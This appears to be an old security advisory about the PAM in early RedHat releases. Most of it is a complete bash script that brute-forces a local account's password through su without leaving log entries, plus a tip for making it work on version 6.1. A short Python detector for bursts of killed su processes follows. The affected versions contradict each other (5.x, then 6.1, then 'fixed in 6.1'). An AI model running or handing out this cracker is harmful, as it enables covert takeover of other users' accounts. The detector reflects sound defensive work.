COMMAND

    pam

SYSTEMS AFFECTED

    RedHat 5.x

PROBLEM

    Michal Zalewski wrote the following brute-force Linux-PAM password
    cracker for RedHat.  Supply a wordlist and take a coffee break:
    nothing shows up in the system logs, and the timing can be tuned
    for performance.

    A vulnerability (feature?) in the PAM shipped with RedHat 6.1
    allows an attacker to perform a rapid brute-force password-guessing
    attack without leaving any evidence in the system logs.

    #!/bin/bash

    # (c) 1999/2000 <lcamtuf@ids.pl>
    # ------------------------------
    #
    # Requirements:
    #
    # - working /bin/su
    # - recent PAM implementation (tested with RedHat 5.x)
    # - 'usleep' command and bash 1.14.x or 2.0.x
    #

    DESTACC='testy'   # Account to crack
    WORDFILE='words'  # Wordfile with passwords to test

    KILLDELAY=03      # Delay (in 1/10 sec) to wait for su (<10)

    # End of setup.

    clear
    echo "RedHat - NothingInLogs[tm] BruteForce(R) Password Crack"
    echo "-------------------------------------------------------"
    echo "  - (c) 1999/2000, Michal Zalewski <lcamtuf@ids.pl> -  "
    echo

    if [ ! "$1" = "" ]; then
      DESTACC="$1"
    fi

    KD=$[KILLDELAY*100000]

    echo "[+] Configured against user '$DESTACC', wordfile: $WORDFILE"
    echo "[+] Kill-delay set to $KD usecs..."


    id "$DESTACC" &>/dev/null

    if [ ! "$?" = "0" ]; then
      echo "[-] Hmm, user '$DESTACC' not found, paranoia?"
      echo
      exit 0
    fi

    SHL="`grep "^$DESTACC:" /etc/passwd|awk -F: '{print $7}'`"

    if [ ! "$SHL" = "/bin/bash" ]; then
      echo "[-] Hmm, user '$DESTACC' has $SHL set as shell, expect problems..."
    fi

    echo "[+] Destination account is alive and well..."

    if [ ! -f "$WORDFILE" ]; then
      echo "[-] Wordfile '$WORDFILE' not found, check it."
      echo
      exit 0
    fi

    if [ ! -u /bin/su ]; then
      echo "[-] Can't find +s on /bin/su, hack me."
      echo
      exit 0
    fi

    if [ ! -x /bin/su ]; then
      echo "[-] Haven't +x on /bin/su, hack me."
      echo
      exit 0
    fi

    echo "[+] /bin/su seems to be executable and setuid, hopefully it works..."

    if [ ! -x /bin/usleep ]; then
      echo "[-] No /bin/usleep in this system. Be a hacker."
      echo
      exit 0
    fi

    if [ "$UID" = "0" ]; then
      echo "[-] Root?! You idiot..."
      echo
      exit 0
    fi

    echo "[+] Let's go straight to number one..."

    LNS="`cat $WORDFILE | wc -l|awk '{print $1}'`"
    CNT=0

    echo "[+] Wordfile '$WORDFILE' loaded - $LNS passwords..."
    echo "[+] Estimated time: $[LNS*KILLDELAY/25] secs, max: $[LNS*KILLDELAY/10] secs."

    while [ "$CNT" -lt "$LNS" ]; do
      CNT=$[CNT+1]
      PASS="`head -$CNT $WORDFILE|tail -1`"
      echo -ne "[?] Trying '$PASS' ($CNT/$LNS)...                \r"
      # Feed the candidate to su on stdin (no tty) and give it KD usecs.
      echo "$PASS" | su "$DESTACC" &>/dev/null &
      usleep $KD
      # A rejected password leaves su still waiting, so the kill succeeds.
      # An accepted one already spawned a shell that hit EOF and exited,
      # so there is nothing left to kill and kill returns non-zero.
      kill -9 $! &>/dev/null
      if [ ! "$?" = "0" ]; then
        echo
        echo "[*] Huh, it worked. I've tried password '$PASS' for '$DESTACC'."
        echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
        echo "[+] Thank You, and hope you enjoyed your stay."
        echo
        exit 0
      fi
    done

    echo "[*] Hmm, end of wordfile, but no matching passwords :("
    echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
    echo "[+] Bad day, try again tomorrow?"
    echo
    exit 0

    Use a pseudoterminal to make it work on 6.1.  Expect is your friend.
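    Nothing reaches syslog, but where process accounting (psacct) is
    enabled every short-lived su still leaves a record, so a burst of su
    runs killed by a signal is the artefact a defender can look for.  The
    detector below is an added example, not part of the original advisory
    or the author's script; it runs over constructed, lastcomm(1)-style
    records, and the column layout, the X flag for "killed by a signal"
    and the timestamp format are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in a lastcomm(1)-like layout (the layout is an assumption):
# command, optional flag letters (X = killed by a signal), user, tty, CPU time, start.
SAMPLE_ACCT = """\
bash                 alice    pts/1    0.02 secs 2000-03-14 10:00:00
su               X   alice    pts/1    0.00 secs 2000-03-14 10:00:01
su               X   alice    pts/1    0.00 secs 2000-03-14 10:00:01
su               X   alice    pts/1    0.00 secs 2000-03-14 10:00:02
su               X   alice    pts/1    0.00 secs 2000-03-14 10:00:02
su               X   alice    pts/1    0.00 secs 2000-03-14 10:00:03
su                   bob      pts/2    0.01 secs 2000-03-14 10:00:03
ls                   bob      pts/2    0.00 secs 2000-03-14 10:00:04
su               X   alice    pts/1    0.00 secs 2000-03-14 10:00:04
"""

LINE_RE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<flags>(?:[SFDX]\s+)*)(?P<user>\S+)\s+(?P<tty>\S+)\s+"
    r"(?P<cpu>[\d.]+) secs\s+(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)$"
)

def parse_acct(text):
    """Yield (start_time, user, command, flag set) for each parseable record."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            yield ts, m["user"], m["cmd"], set(m["flags"].split())

def find_su_bursts(text, window_s=10, threshold=5):
    """Return {user: peak count} for users with >= threshold signal-killed su
    runs inside any window_s-second window; quiet users are omitted."""
    recent = defaultdict(deque)   # per-user start times of killed su runs
    peaks = {}
    for ts, user, cmd, flags in parse_acct(text):
        if cmd != "su" or "X" not in flags:
            continue                # completed su runs are not suspicious here
        q = recent[user]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()             # slide the window forward
        if len(q) >= threshold:
            peaks[user] = max(peaks.get(user, 0), len(q))
    return peaks
if __name__ == "__main__":
    for user, n in find_su_bursts(SAMPLE_ACCT).items():
        print(f"[!] {user}: {n} killed su runs within 10s, possible brute force")
```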

SOLUTION

    Nothing to do with security...  It is already fixed in Red Hat 6.1
    (pam-0.68-7).